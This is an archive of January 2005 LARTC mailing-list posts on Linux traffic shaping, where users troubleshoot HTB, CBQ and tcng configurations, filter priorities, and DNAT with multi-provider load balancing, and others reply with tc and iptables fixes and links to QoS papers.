From cvok@bonet.sk Sat Jan 1 09:45:08 2005 From: cvok@bonet.sk (cvok@bonet.sk) Date: Sat, 1 Jan 2005 10:45:08 +0100 Subject: [LARTC] htb bridge problem, please chceck my config Message-ID: <1104572708.41d671247a360@www.bonet.sk> hello. i have following setup: a machine (winChip 200mhz cpu, 32mb ram, linux 2.4.28) acting like a bridge with 2 interfaces (eth0 - to our ISP, eth1 - to our network) machine does not have any IP there is a 802.1q vlan eth0.2 eth0.2 and eth1 are bridged in br0 i have one 4mbit link which i share with my friend, i have 3mbit and he has 1mbit all our IP addresses are public and we have the following setup /sbin/tc qdisc add dev eth1 root handle 1: htb default 2 /sbin/tc class add dev eth1 parent 1: classid 1:1 htb rate 4mbit ceil 4mbit /sbin/tc class add dev eth1 parent 1:1 classid 1:2 htb rate 3mbit ceil 3mbit /sbin/tc class add dev eth1 parent 1:1 classid 1:3 htb rate 1mbit ceil 1mbit /sbin/tc filter add dev eth1 protocol ip parent 1:0 pref 1 u32 match ip src FRIEDNS_IP flowid 1:3 /sbin/tc filter add dev eth1 protocol ip parent 1:0 pref 1 u32 match ip src MY_IP flowid 1:2 /sbin/tc qdisc add dev eth0.2 root handle 1: htb default 2 /sbin/tc class add dev eth0.2 parent 1: classid 1:1 htb rate 4mbit ceil 4mbit /sbin/tc class add dev eth0.2 parent 1:1 classid 1:2 htb rate 3mbit ceil 3mbit /sbin/tc class add dev eth0.2 parent 1:1 classid 1:3 htb rate 1mbit ceil 1mbit /sbin/tc filter add dev eth0.2 protocol ip parent 1:0 pref 1 u32 match ip dst FRIENDS_IP flowid 1:3 /sbin/tc filter add dev eth0.2 protocol ip parent 1:0 pref 1 u32 match ip dst MY_IP flowid 1:3 but it doesnt work well, my ISP link is stable, but i hardly ever get from my shaped link more 2mbit. where am i making mistake? Thanks. Matis From andy.furniss@dsl.pipex.com Sat Jan 1 23:58:54 2005 From: andy.furniss@dsl.pipex.com (Andy Furniss) Date: Sat, 01 Jan 2005 23:58:54 +0000 Subject: [LARTC] does the inbound traffic affect the outbound on 2 different interfaces In-Reply-To: <62916e504122306336585e4ed@mail.gmail.com> References: <62916e504122306336585e4ed@mail.gmail.com> Message-ID: <41D7393E.5060207@dsl.pipex.com> Sujith Chennupati wrote: > hey guys > > i am regulating the traffic to & fro by my network through a > linux gateway , its behaving strange. i regulated Downlink to 2Mbps & > UPlLINK to 500Kbps. both perform well when those are done independent > i.e. one at a time > > but when i do both from a client system ..the downlink however > continues at 2mbps but the uplink falls down to 100kbps? You probably need to priorotise empty acks in each direction. > > is something wrong with my script or is there some other reason to > explain this ????? I've never used CBQ so can't really say, you could do the same thing with HTB. Andy. From andy.furniss@dsl.pipex.com Sun Jan 2 00:07:28 2005 From: andy.furniss@dsl.pipex.com (Andy Furniss) Date: Sun, 02 Jan 2005 00:07:28 +0000 Subject: [LARTC] prio In-Reply-To: <3927344519.20041225190843@inbox.lv> References: <3927344519.20041225190843@inbox.lv> Message-ID: <41D73B40.2000207@dsl.pipex.com> kasp wrote: > Hi! > > Could somebody tell me, what is difference between these two prio > parameters in http://lartc.org/lartc.html#AEN2241 > > 1) tc class add dev $DEV parent 1:1 classid 1:10 htb rate ${UPLINK}kbit burst 6k prio 1 > ^^^^^^ > AND > > 2) tc filter add dev $DEV parent 1:0 protocol ip prio 10 u32 match ip tos 0x10 0xff flowid 1:10 > ^^^^^^^ > > Why they aren't equal? > Is there some rules to set prio for each of them? > > prio on htb mainly affects the way it shares excess bandwidth - the lower the number the higher the priority. On filters it lets you choose the order your rules get tested against the packets. I haven't look at the script - but the prio on the filter is unlikely to make any noticable difference if changed/ommitted. Andy. From andy.furniss@dsl.pipex.com Sun Jan 2 00:15:28 2005 From: andy.furniss@dsl.pipex.com (Andy Furniss) Date: Sun, 02 Jan 2005 00:15:28 +0000 Subject: [LARTC] wonder shaper and vsftp In-Reply-To: <20041228030251.97439.qmail@web11803.mail.yahoo.com> References: <20041228030251.97439.qmail@web11803.mail.yahoo.com> Message-ID: <41D73D20.8060204@dsl.pipex.com> Kinchan wrote: > I have a linux server connecto into a 100mps LAN, i > use iptables implementation of shorewall > (shorewall.net) and then I used the wondershaper. > > When I adjusted the values below, I got a download > speed for vsftp at a whooping 1187.91 KB/s but a > upload speed is only a painful 27 KB/s. > > I dont fully understand the underpinng codes behind > the wondershaper htb stuff. can someone guide me on > how can i increase my ftp upload speed? > > Note: when i disble the firewall, i get a very slow > download and upload speed at around 20 KB/s or slower. > When I try to enable the firewall and then disable the > traffic shaping, I also got a slow download and > upload, so I guess the wonder shaper is really doing > its job. Are these slow speeds when you do both at once or testing up/down seperately? (what do you get with just upload and everything off) Andy. From andy.furniss@dsl.pipex.com Sun Jan 2 00:34:50 2005 From: andy.furniss@dsl.pipex.com (Andy Furniss) Date: Sun, 02 Jan 2005 00:34:50 +0000 Subject: [LARTC] Simple case here! In-Reply-To: <41D17063.6030406@hotpop.com> References: <41D17063.6030406@hotpop.com> Message-ID: <41D741AA.9090209@dsl.pipex.com> Amit Vyas wrote: > > Hi All, > > I want to setup a machine to connect to internet at a limited rate of 64 > kbps. > That machine is connected to a switch. so my LAN and Internet both comes > from the same eth0. > How can I limit only the internet access from this machine to 64kbps and > still using 100mbps for LAN > > I am trying to implement this Please guide me If i am wrong. > I mark all the packets going out to LAN. > Then I can setup a root qdisc to classify packets based on that mark. If > match then I can setup a class to accept those setup a fifo for those > packets. but if the packets are not for the LAN then i can pass them to > other class which is tbf shaping at rate 64kbps. > > Am i right on these lines. > This is the setup > > +------------+ eth0 +-----------+ internet > | machine |---------------| Switch |------------- > +------------+ +-----------+ > > trying to get some thing like this > > root qdisc (CBQ or something) > / \ > / \ > / \ > / \ > class class > Internal LAN Pcakets Any other unclassified Packets > | | > | | > FIFO TBF (rate 64kbps) > > Please Help me out with marking the packets and to classify them. > Just started off with Traffic Shaping. gigles...... : ) > > It is alos possible to alternatively to mark internet traffic as it > would be less in comparison to LAN and thus processor friendly. > > Amit Vyas I would use netfilter + HTB something like - $TC qdisc add dev eth0 root handle 1:0 htb default 0 $TC class add dev eth0 parent 1:0 classid 1:1 htb rate 64kbit $TC filter add dev eth0 parent 1:0 protocol ip handle 1 fw flowid 1:1 $IPTABLES -t mangle -A POSTROUTING -o eth0 --dst ! 192.168.0.0/24 -j MARK --set-mark 1 Depending on what the PC does it may be nicer to priorotise empty acks / udp headed for the internet over bulk traffic. Andy. From andy.furniss@dsl.pipex.com Sun Jan 2 00:37:25 2005 From: andy.furniss@dsl.pipex.com (Andy Furniss) Date: Sun, 02 Jan 2005 00:37:25 +0000 Subject: [LARTC] traffic shaping , where? In-Reply-To: <41C982BB00004EE2@ims4d.cp.tin.it> References: <41C982BB00004EE2@ims4d.cp.tin.it> Message-ID: <41D74245.7070103@dsl.pipex.com> thebet@tin.it wrote: > Hi > I would want to use the patch for squid released by patrick mcHardy, but > it requires that squid is located on the same machine that does traffic > shaping. My configuration is different: > i have the screening HDSL router directly connected to a multi-ethernet > firewall and the proxy located on a DMZ box. > i would want the firewall doing traffic shaping. > > Internet > | > ------------------------- > - HDSL ROUTER - > ------------------------- > | > | > ------------------------- ----------------- > - FIREWALL - ---------- - PROXY - > ------------------------- ----------------- > > > > To the point: > have sense to make traffic shaping on a dmz box that it's not directly controlling > the internet link? I would shape on the firewall. Andy. From andy.furniss@dsl.pipex.com Sun Jan 2 01:07:28 2005 From: andy.furniss@dsl.pipex.com (Andy Furniss) Date: Sun, 02 Jan 2005 01:07:28 +0000 Subject: [LARTC] Shaping traffic on heavily oversubscribed links? In-Reply-To: <41B44890.4090401@comkey.spark.net.gr> References: <41A5A31B.8010901@expertron.co.za> <41B44890.4090401@comkey.spark.net.gr> Message-ID: <41D74950.5010407@dsl.pipex.com> Dimitris Kotsonis wrote: > Justin Schoeman wrote: > >> Hi all, >> >> I am having some fun with traffic shaping, and have run into an >> interesting situation. Here is South Africa, most internet links are >> heavily oversubscribed, which means that in most cases the local link >> is _not_ the bottleneck, and shaping on the local link does not help >> that much... >> > > We have the same problem in DSL lines here in Greece. > > I have found that while the average efective speed on such lines varies, > tha average rate of packets is more or less constant. I have a theory > for this. I believe that the routers that forward the traffic on > congested lines - on ISPs and on the ATM circuits at the telcoms - don't > take the extra time needed to calculate the size of the packets and > distribute the traffic on a per packet basis. This leads to a 'fairness' > among the end receivers based on packets/sec instead of bandwidth. > > To be more specific. In my ADSL line I usually achieve between 20-30 pps > (measured with MRTG). With an average packet size of 1500 this is 20-45 > kbytes/sec. But packets sizes close to the MTU are found on single > ftp/http connections and pretty much nowehere else. Packet sizes of 400 > to 500 are more realistic, especially when p2p programs are involved. > 20-30 packets give 8-10kbytes/sec. You can expect even less when using > voip programs which utilize smaller packets. > > If you find that single a FTP session tends to get more bandwidth thatn > p2p programs or multiuser traffic then you have a simillar problem to > our own. I would suggest that you setup MRTG to monitor packets to > research further into this. It is normal for an FTP download to take over from p2ps the latter are likely to be higher latency, so TCP will let a lower latency FTP grab more bandwidth. Try shaping with HTB and sfq - It should help. > > > >> Does anybody have some tips on shaping such links? How can you get >> interractive traffic if you don't know how much bandwidth to reserve >> for it? How can you give fair access to a link if you don't know what >> the link capacity is? >> > > Well, I am working on one. Since I can't shape bandwidth because it > flactuates erratically with time and usage I decided to shape packets. I > have created a new queueing discipline based on TBF which uses packets > instead of bytes for its tokens and I am allocating a constant > packet/sec rate on each user of my ADSL line. A better solution would be > to create an HTB alike packet-based qdisc for dynamic shaping. > > If you find that you have the some problem as me and you want to > experiment with a packet-based TBF qdisc I can send you a patch for > linux-2.6.8 and iproute2 in this list. > > I would like to here your thought on this anyway ... > > Dimitris > > > > _______________________________________________ > LARTC mailing list / LARTC@mailman.ds9a.nl > http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/ > From Zhenyu Wu" Hello, As it is well know that CBQ is the class based queue. But i am confused on the word "class" now, especially it is used in Diffserv. IMO, different classes should mean that there are different kinds of traffics, so the class should be difined by the parameters (such as bandwidth, priority..) the traffic wanted. That is, using cbq we can define different kinds of traffics which need different bandwidth at the gateway, am i right?? Then, in diffserv the traffic is identified by the DSCP, right? From Floyd's paper Link-sharing and Resource Management Models for Packet Networks, we can see if there are two classes of traffic such as class A and class B, and each of them has traffics video and ftp, then how the two different FTP are identified in diffserv, by their DSCP? IMO, at first, according to the bandwidth the traffic needed, the traffic is classified into class A or class B, then at each class the traffic is identified by their DSCP. Eagerly waiting for your reply! Happy New Year! From lartc@tracker.fire-world.de Sun Jan 2 04:05:22 2005 From: lartc@tracker.fire-world.de (Sebastian Wiesinger) Date: Sun, 2 Jan 2005 05:05:22 +0100 Subject: [LARTC] Performance Loss with HTB/tcng? Message-ID: <20050102040521.GB29646@data.fire-world.de> Hi, I try to shape my incoming traffic. I have 2MBit/s DSL bandwith and the following ruleset (on the internal interface): $INT="eth1"; $INT_NET=192.168.1.0; $MAX_IN=2Mbps; dev $INT { egress { class (<$int>) if ip_src:24 == $INT_NET; class (<$ssh>) if tcp_sport == PORT_SSH; class (<$smtp>) if tcp_sport == PORT_SMTP; class (<$http>) if tcp_sport == PORT_HTTP; class (<$http>) if tcp_sport == PORT_HTTPS; class (<$nntp>) if tcp_sport == PORT_NNTP; class (<$nntp>) if tcp_sport == PORT_NNTPS; class (<$other>) if 1; htb() { class (rate 100Mbps, ceil 100Mbps) { class (rate $MAX_IN, ceil $MAX_IN) { $ssh = class (rate 100kbps, ceil $MAX_IN, prio 1) {sfq;}; $smtp = class (rate 100kbps, ceil $MAX_IN, prio 2) {sfq;}; $http = class (rate 100kbps, ceil $MAX_IN, prio 2) {sfq;}; $nntp = class (rate 100kbps, ceil $MAX_IN, prio 2) {sfq;}; $other = class (rate $MAX_IN-400kbps, ceil $MAX_IN, prio 0) {sfq;}; } $int = class (rate 100Mbps-$MAX_IN, ceil 100Mbps) {sfq;}; } } } } My problem is: when I download something with bittorrent (class $other) I have 150-200 KB/s without shaping and 80-100KB/s with shaping enabled. Statistics for $other: class htb 2:7 parent 2:2 leaf 7: prio 0 rate 1600Kbit ceil 2Mbit burst 3599b cburst 4Kb Sent 8271156 bytes 8165 pkts (dropped 0, overlimits 0 requeues 0) rate 108047bit 107pps lended: 7499 borrowed: 666 giants: 0 tokens: -16443 ctokens: -13925 I don't know if there is a more elegant way to shape this or what I can do to get more performance. Regards, Sebastian -- GPG Key-ID: 0x76B79F20 (0x1B6034F476B79F20) Wehret den Anfaengen: http://odem.org/informationsfreiheit/ Thunder rolled. ... It rolled a six. --Terry Pratchett, Guards! Guards! From ionut@topall.ro Sun Jan 2 11:26:18 2005 From: ionut@topall.ro (ionut@topall.ro) Date: Sun, 2 Jan 2005 13:26:18 +0200 (EET) Subject: [LARTC] Re: htb bridge problem, please chceck my config In-Reply-To: <20050102055602.17138.47839.Mailman@outpost.ds9a.nl> References: <20050102055602.17138.47839.Mailman@outpost.ds9a.nl> Message-ID: <3295.81.180.254.1.1104665178.squirrel@81.180.254.1> > a machine (winChip 200mhz cpu, 32mb ram, linux 2.4.28) acting like a > bridge > with > 2 interfaces (eth0 - to our ISP, eth1 - to our network) > machine does not have any IP > > there is a 802.1q vlan eth0.2 > eth0.2 and eth1 are bridged in br0 > > i have one 4mbit link which i share with my friend, i have 3mbit and he > has > 1mbit > > all our IP addresses are public and we have the following setup > > /sbin/tc qdisc add dev eth1 root handle 1: htb default 2 > /sbin/tc class add dev eth1 parent 1: classid 1:1 htb rate 4mbit ceil > 4mbit > /sbin/tc class add dev eth1 parent 1:1 classid 1:2 htb rate 3mbit ceil > 3mbit > /sbin/tc class add dev eth1 parent 1:1 classid 1:3 htb rate 1mbit ceil > 1mbit your filters will not work because of the parent > /sbin/tc filter add dev eth1 protocol ip parent 1:0 pref 1 u32 match ip > src > FRIEDNS_IP flowid 1:3 tc filter add dev eth1 prio 7 parent 1: protocol ip u32 match ip dst FRIENDS_IP flowid 1:3 > /sbin/tc filter add dev eth1 protocol ip parent 1:0 pref 1 u32 match ip > src > MY_IP flowid 1:2 tc filter add dev eth1 prio 7 parent 1: protocol ip u32 match ip dst MY_IP flowid 1:2 From Oswin Budiman Mon Jan 3 03:03:10 2005 From: Oswin Budiman (Oswin Budiman) Date: Mon, 3 Jan 2005 10:03:10 +0700 Subject: [LARTC] (no subject) Message-ID: <671374730501021903512d7fca@mail.gmail.com> > Have you done ifconfig lo mtu 1500 ? Yup, it also didn't work. Any clue? Just for note, when I try a TBF shaping example from internet, it works flawlessly. -- - There's always the first for everything - From Oswin Budiman Mon Jan 3 03:04:49 2005 From: Oswin Budiman (Oswin Budiman) Date: Mon, 3 Jan 2005 10:04:49 +0700 Subject: [LARTC] HTB - ethloop - overlimits? Message-ID: <6713747305010219046d8d2818@mail.gmail.com> Sorry, I forgot to write the subject... > Have you done ifconfig lo mtu 1500 ? Yup, it also didn't work. Any clue? Just for note, when I try a TBF shaping example from internet, it works flawlessly. From marcogh@linux.it Mon Jan 3 11:22:15 2005 From: marcogh@linux.it (marco ghidinelli) Date: Mon, 3 Jan 2005 12:22:15 +0100 Subject: [LARTC] Weighted packet shaping? In-Reply-To: <20041228092343.GA8003@linux.comp> References: <41C97B57.80207@dsl.pipex.com> <20041222153607.GC11969@linux.comp> <41C9FB14.6000805@dsl.pipex.com> <20041223105418.GA19364@linux.comp> <41CC22F1.70907@dsl.pipex.com> <20041224150730.GA18760@linux.comp> <41CC457A.5040405@dsl.pipex.com> <20041226042648.GA24904@linux.comp> <41CEB816.5030902@dsl.pipex.com> <20041228092343.GA8003@linux.comp> Message-ID: <20050103112214.GA10708@circolab.net> On Tue, Dec 28, 2004 at 07:53:43PM +1030, Mark Williams (MWP) wrote: > > Ok... > Using your script gave the following (from 17:30 onwards): > > http://www.overclockers.com.au/~mwp/temp/tc-1hour-yours.png > > Purple is class 23; all other traffic, in this case bittorrent. > Blue is class 21; a windows box, in this case an FTP transfer. > > Shouldnt class 23 still be dropping off further than that? > It seems HTB is wanting to share traffic equally among on the classes rather than by priority. > > You script is pretty much having the same effect as mine :( ok, maybe i'm wrong, but i try to run the same script, and i think that the script have problem setting prio 0 on filters: running: $TC filter add dev $IFNAME parent 1:0 prio 0 protocol ip handle 22 fw flowid 1:20 $TC filter add dev $IFNAME parent 1:0 prio 2 protocol ip handle 21 fw flowid 1:21 gave me: # tc filter list dev eth0 filter parent 1: protocol ip pref 2 fw filter parent 1: protocol ip pref 2 fw handle 0x15 classid 1:21 filter parent 1: protocol ip pref 49152 fw filter parent 1: protocol ip pref 49152 fw handle 0x16 classid 1:20 ----------------------------------^^^^^ don't blame me if this is obvious/wrong/stupid. :) 2.6.10, with lastest iproute2 -- BOFH excuse #212: Of course it doesn't work. We've performed a software upgrade. From lists@L8R.net Mon Jan 3 18:32:55 2005 From: lists@L8R.net (Brad Barnett) Date: Mon, 3 Jan 2005 13:32:55 -0500 Subject: [LARTC] load balancing and DNAT Message-ID: <20050103133255.2474878c@be.back.l8r.net> Does anyone know if load balancing and DNAT work well together? I know that load balancing and NAT do not, but what about a simple port forward? I can't apply Julian Anastasov's patches, because they don't work with PPTP patches. :/ Anyhow, a simple: iptables -t nat -A PREROUTING -i eth0 -p tcp --dport xxx -j DNAT --to yyy:xxx iptables -I FORWARD -i eth0 -d yyy -p tcp --dport xxx -o eth1 -j ACCEPT does not seem to work. From stef.coene@docum.org Mon Jan 3 21:33:15 2005 From: stef.coene@docum.org (Stef Coene) Date: Mon, 3 Jan 2005 22:33:15 +0100 Subject: [LARTC] htb bridge problem, please chceck my config In-Reply-To: <1104572708.41d671247a360@www.bonet.sk> References: <1104572708.41d671247a360@www.bonet.sk> Message-ID: <200501032233.15631.stef.coene@docum.org> On Saturday 01 January 2005 10:45, cvok@bonet.sk wrote: > hello. i have following setup: > > a machine (winChip 200mhz cpu, 32mb ram, linux 2.4.28) acting like a brid= ge > with > 2 interfaces (eth0 - to our ISP, eth1 - to our network) > machine does not have any IP > > there is a 802.1q vlan eth0.2 > eth0.2 and eth1 are bridged in br0 > > i have one 4mbit link which i share with my friend, i have 3mbit and he h= as > 1mbit > > all our IP addresses are public and we have the following setup > > /sbin/tc qdisc add dev eth1 root handle 1: htb default 2 > /sbin/tc class add dev eth1 parent 1: classid 1:1 htb rate 4mbit ceil 4mb= it > /sbin/tc class add dev eth1 parent 1:1 classid 1:2 htb rate 3mbit ceil > 3mbit /sbin/tc class add dev eth1 parent 1:1 classid 1:3 htb rate 1mbit > ceil 1mbit /sbin/tc filter add dev eth1 protocol ip parent 1:0 pref 1 u32 > match ip src FRIEDNS_IP flowid 1:3 > /sbin/tc filter add dev eth1 protocol ip parent 1:0 pref 1 u32 match ip s= rc > MY_IP flowid 1:2 > > > /sbin/tc qdisc add dev eth0.2 root handle 1: htb default 2 > /sbin/tc class add dev eth0.2 parent 1: classid 1:1 htb rate 4mbit ceil > 4mbit /sbin/tc class add dev eth0.2 parent 1:1 classid 1:2 htb rate 3mbit > ceil 3mbit /sbin/tc class add dev eth0.2 parent 1:1 classid 1:3 htb rate > 1mbit ceil 1mbit /sbin/tc filter add dev eth0.2 protocol ip parent 1:0 pr= ef > 1 u32 match ip dst FRIENDS_IP flowid 1:3 > /sbin/tc filter add dev eth0.2 protocol ip parent 1:0 pref 1 u32 match ip > dst MY_IP flowid 1:3 > > > but it doesnt work well, my ISP link is stable, but i hardly ever get from > my shaped link more 2mbit. where am i making mistake? Some stuff to check out: =2D are the tc stats changing? =2D try ceil 3.5mbit so _you_ are the bottleneck =2D I'm not sure if you can shape on a vlan Oh, your filters are ok. Stef =2D-=20 stef.coene@docum.org =A0"Using Linux as bandwidth manager" =A0 =A0 =A0http://www.docum.org/ From mingching.tiew@redtone.com Tue Jan 4 01:36:59 2005 From: mingching.tiew@redtone.com (Ming-Ching Tiew) Date: Tue, 4 Jan 2005 09:36:59 +0800 Subject: [LARTC] load balancing and DNAT References: <20050103133255.2474878c@be.back.l8r.net> Message-ID: <008201c4f1fd$e3d7ff20$0100a8c0@newlife> From: "Brad Barnett" > > I can't apply Julian Anastasov's patches, because they don't work with > PPTP patches. :/ > I must have missed something. May I know where you learned that Julian Anastasov's patches won't work with PPTP patches ? Any URL ? Cheers From lists@L8R.net Tue Jan 4 02:03:37 2005 From: lists@L8R.net (Brad Barnett) Date: Mon, 3 Jan 2005 21:03:37 -0500 Subject: [LARTC] load balancing and DNAT In-Reply-To: <008201c4f1fd$e3d7ff20$0100a8c0@newlife> References: <20050103133255.2474878c@be.back.l8r.net> <008201c4f1fd$e3d7ff20$0100a8c0@newlife> Message-ID: <20050103210337.6d9e0ceb@be.back.l8r.net> On Tue, 4 Jan 2005 09:36:59 +0800 "Ming-Ching Tiew" wrote: > > From: "Brad Barnett" > > > > I can't apply Julian Anastasov's patches, because they don't work with > > PPTP patches. :/ > > > > I must have missed something. May I know where you learned that > Julian Anastasov's patches won't work with PPTP patches ? Any URL ? > Personal experience. I can't get any recent 2.4.x kernel to compile with PPTP and the Julian Anastasov's patches. It's been over a month now, but I tried several versions, I believe back to 2.4.25... From Zhenyu Wu" Hello, Normally, in addition to such qdisc scheduler mechanisms as FIFO, PQ, WRR, WFQ, are there any more? Then, there is a confusion on scheduler in Linux enviroment: Assume there is a qdisc, such as RED as a leaf qdisc in a router, we know, if there is packet which want to enqueue the packet, the Function red_enqueue is called, but when the packet leave the queue(when the Function red_dequeue is called)? I think it is meaningless when the pack leaves the queue just it enterred it. Is there anything need to be done betweent the packet's enqueue and dequeue? Best, From mingching.tiew@redtone.com Tue Jan 4 02:27:17 2005 From: mingching.tiew@redtone.com (Ming-Ching Tiew) Date: Tue, 4 Jan 2005 10:27:17 +0800 Subject: [LARTC] load balancing and DNAT References: <20050103133255.2474878c@be.back.l8r.net><008201c4f1fd$e3d7ff20$0100a8c0@newlife> <20050103210337.6d9e0ceb@be.back.l8r.net> Message-ID: <00e301c4f204$e956b020$0100a8c0@newlife> From: "Brad Barnett" > > Personal experience. I can't get any recent 2.4.x kernel to compile with > PPTP and the Julian Anastasov's patches. It's been over a month now, but > I tried several versions, I believe back to 2.4.25... > PPTP server or client ? I supposed you mean MPPE patches ? I compiled it together with Julian Anastasov's patches on 2.4.27. I am not sure if they work together, but it compiles at least ! Cheers From lists@L8R.net Tue Jan 4 02:30:10 2005 From: lists@L8R.net (Brad Barnett) Date: Mon, 3 Jan 2005 21:30:10 -0500 Subject: [LARTC] load balancing and DNAT In-Reply-To: <00e301c4f204$e956b020$0100a8c0@newlife> References: <20050103133255.2474878c@be.back.l8r.net> <008201c4f1fd$e3d7ff20$0100a8c0@newlife> <20050103210337.6d9e0ceb@be.back.l8r.net> <00e301c4f204$e956b020$0100a8c0@newlife> Message-ID: <20050103213010.444f999f@be.back.l8r.net> On Tue, 4 Jan 2005 10:27:17 +0800 "Ming-Ching Tiew" wrote: > > From: "Brad Barnett" > > > > Personal experience. I can't get any recent 2.4.x kernel to compile > > with PPTP and the Julian Anastasov's patches. It's been over a month > > now, but I tried several versions, I believe back to 2.4.25... > > > > PPTP server or client ? I supposed you mean MPPE patches ? > I compiled it together with Julian Anastasov's patches on 2.4.27. > I am not sure if they work together, but it compiles at least ! MPPE patches. I have a feeling that you don't have some of the same .config options that I do. From mingching.tiew@redtone.com Tue Jan 4 03:11:10 2005 From: mingching.tiew@redtone.com (Ming-Ching Tiew) Date: Tue, 4 Jan 2005 11:11:10 +0800 Subject: [LARTC] load balancing and DNAT References: <20050103133255.2474878c@be.back.l8r.net><008201c4f1fd$e3d7ff20$0100a8c0@newlife><20050103210337.6d9e0ceb@be.back.l8r.net><00e301c4f204$e956b020$0100a8c0@newlife> <20050103213010.444f999f@be.back.l8r.net> Message-ID: <017801c4f20b$13887ad0$0100a8c0@newlife> From: "Brad Barnett" > > > > > > > PPTP server or client ? I supposed you mean MPPE patches ? > > I compiled it together with Julian Anastasov's patches on 2.4.27. > > I am not sure if they work together, but it compiles at least ! > > MPPE patches. > > I have a feeling that you don't have some of the same .config options that > I do. Really ? I am more thinking we are not having the exact same patches. The PPTP stuff has a lot of ***OLD*** information floating around. Cheers. From lists@L8R.net Tue Jan 4 03:23:11 2005 From: lists@L8R.net (Brad Barnett) Date: Mon, 3 Jan 2005 22:23:11 -0500 Subject: [LARTC] load balancing and DNAT In-Reply-To: <017801c4f20b$13887ad0$0100a8c0@newlife> References: <20050103133255.2474878c@be.back.l8r.net> <008201c4f1fd$e3d7ff20$0100a8c0@newlife> <20050103210337.6d9e0ceb@be.back.l8r.net> <00e301c4f204$e956b020$0100a8c0@newlife> <20050103213010.444f999f@be.back.l8r.net> <017801c4f20b$13887ad0$0100a8c0@newlife> Message-ID: <20050103222311.105e7c9e@be.back.l8r.net> On Tue, 4 Jan 2005 11:11:10 +0800 "Ming-Ching Tiew" wrote: > > From: "Brad Barnett" > > > > > > > > > > PPTP server or client ? I supposed you mean MPPE patches ? > > > I compiled it together with Julian Anastasov's patches on 2.4.27. > > > I am not sure if they work together, but it compiles at least ! > > > > MPPE patches. > > > > I have a feeling that you don't have some of the same .config options > > that I do. > > Really ? I am more thinking we are not having the exact same patches. > The PPTP stuff has a lot of ***OLD*** information floating around. > It does, but before we go too much further, does anyone have an answer to my original question? I'm bogged for time (aren't well all? ;), and I'd prefer to just find out if my problems with DNAT are indeed from what I think... Other than that.. I'm using the 'linux-2.4.25-mppe-20040216.patch' MPPE patches.... From mingching.tiew@redtone.com Tue Jan 4 03:33:59 2005 From: mingching.tiew@redtone.com (Ming-Ching Tiew) Date: Tue, 4 Jan 2005 11:33:59 +0800 Subject: [LARTC] load balancing and DNAT References: <20050103133255.2474878c@be.back.l8r.net><008201c4f1fd$e3d7ff20$0100a8c0@newlife><20050103210337.6d9e0ceb@be.back.l8r.net><00e301c4f204$e956b020$0100a8c0@newlife><20050103213010.444f999f@be.back.l8r.net><017801c4f20b$13887ad0$0100a8c0@newlife> <20050103222311.105e7c9e@be.back.l8r.net> Message-ID: <01a701c4f20e$3dce2300$0100a8c0@newlife> From: "Brad Barnett" > > It does, but before we go too much further, does anyone have an answer to > my original question? I'm bogged for time (aren't well all? ;), and I'd > prefer to just find out if my problems with DNAT are indeed from what I > think... > But I am getting at the point that you can't really do a proper NAT load balancing without Julian's patches. You have to get it to compiled. Period. Cheers. From lists@L8R.net Tue Jan 4 03:46:31 2005 From: lists@L8R.net (Brad Barnett) Date: Mon, 3 Jan 2005 22:46:31 -0500 Subject: [LARTC] load balancing and DNAT In-Reply-To: <01a701c4f20e$3dce2300$0100a8c0@newlife> References: <20050103133255.2474878c@be.back.l8r.net> <008201c4f1fd$e3d7ff20$0100a8c0@newlife> <20050103210337.6d9e0ceb@be.back.l8r.net> <00e301c4f204$e956b020$0100a8c0@newlife> <20050103213010.444f999f@be.back.l8r.net> <017801c4f20b$13887ad0$0100a8c0@newlife> <20050103222311.105e7c9e@be.back.l8r.net> <01a701c4f20e$3dce2300$0100a8c0@newlife> Message-ID: <20050103224631.109b32b0@be.back.l8r.net> On Tue, 4 Jan 2005 11:33:59 +0800 "Ming-Ching Tiew" wrote: > > From: "Brad Barnett" > > > > It does, but before we go too much further, does anyone have an answer > > to my original question? I'm bogged for time (aren't well all? ;), > > and I'd prefer to just find out if my problems with DNAT are indeed > > from what I think... > > > > But I am getting at the point that you can't really do a proper NAT load > balancing without Julian's patches. You have to get it to compiled. > Period. > Well, you can do load balancing, but yes.. it is much improved (to say the least) with his patches. However, I misspoke. I was referring to simple routing for multiple providers. That is, just routing back out on the interface that traffic originates on. Unfortunately, since I can't apply Julian's patches, any benefits I might gain are not even worth consideration. :( Since I tried to apply his patches, and am unable to, please stop rubbing my nose in it. ;) I am aware that I am missing something, please don't make my loss seem ever more painful ;P From imipak@yahoo.com Tue Jan 4 05:39:12 2005 From: imipak@yahoo.com (Jonathan Day) Date: Mon, 3 Jan 2005 21:39:12 -0800 (PST) Subject: [LARTC] Scheduler Mechnisms! In-Reply-To: <304808537.11599@njupt.edu.cn> Message-ID: <20050104053912.37916.qmail@web12304.mail.yahoo.com> It depends on what you mean by "more". More for Linux? Certainly. HTB3 seems to be a popular mechanism, and you can use IMQ to set up an intermediate device to allow shaping of both inbound and outbound traffic, using one (or more!) scheduling mechanisms in series. (In fact, there are several versions of IMQ out there. I've given links to both the projects that seem to be alive, but there may be more.) There's also ESFQ, but there doesn't seem to be much active work on that. There are forward ports to recent Linux kernels, though. QLinux has a version of H-SFQ for Linux, but again it seems to be getting long in the tooth. Unfortunately, I can't find any forward ports of that. http://luxik.cdi.cz/~devik/qos/htb/ http://www.linuximq.net/ http://pupa.da.ru/imq/ http://www.digriz.org.uk/jdg-qos-script/#qos-2.6 http://kem.p.lodz.pl/~peter/qnet/ http://lass.cs.umass.edu/software/qlinux/ There are a great many systems that I can't find a Linux version of. Cisco routers support something called "Class-Based Weighted Fair Queueing" (CBWFQ) which seems to be a hybrid of classful and classless scheduling. Cisco also has two versions of ECN, for forwards and backwards propogation. I've listed below a number of papers detailing various QoS schemes. Some of these have been implemented in other OS' (the BSDs tend to get a lot of this stuff implemented quickly for them as part of ALTQ) and some I've never seen an implementation at all. However, the papers should all give enough information to write a version for Linux. Note: ALTQ can be found at: http://www.csl.sony.co.jp/person/kjc/kjc/software.html Please note that this list is not exhaustive. Rather, I got exhausted after trying to find what was out there and what state it was currently in. QoS is a big field, if the number of papers is anything to go by. Linux only touches the fringes of it. If anyone feels particularly bored, or in need of a good ego boost, it would be cool to see if a reasonable selection of these could be introduced into Linux over the 2.7 cycle. EDF (Earliest Deadline First) http://citeseer.ist.psu.edu/13919.html BLUE (an alternative to RED) http://citeseer.ist.psu.edu/feng99blue.html AF PHB (Assured Forwarding Per-Hop Behaviour) http://citeseer.ist.psu.edu/552302.html SFB (Stochastic Fair Blue) 